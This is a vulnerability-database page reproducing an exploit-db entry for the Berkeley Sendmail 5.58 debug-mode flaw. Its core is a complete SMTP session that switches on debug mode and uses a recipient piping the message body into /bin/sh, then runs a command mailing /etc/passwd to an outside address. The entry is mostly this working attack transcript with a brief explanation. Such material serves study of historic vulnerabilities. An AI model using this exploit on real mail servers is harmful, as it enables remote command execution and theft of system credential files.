Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbAnonymousEDB-ID:19028
HistoryAug 01, 1988 - 12:00 a.m.

Berkeley Sendmail 5.58 - Debug

1988-08-0100:00:00
anonymous
www.exploit-db.com
35

7.4 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%

JSON
220 mail.victim.com SMTP
helo attacker.com
250 Hello attacker.com, pleased to meet you.
debug
200 OK
mail from: </dev/null>
250 OK
rcpt to:<|sed -e '1,/^$/'d | /bin/sh ; exit 0">
250 OK
data
354 Start mail input; end with <CRLF>.<CRLF>
mail [email protected] </etc/passwd
.
250 OK
quit
221 mail.victim.com Terminating

The sed in the receipient strips all mail headers from the
message before passing it on to the shell.

7.4 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%

JSON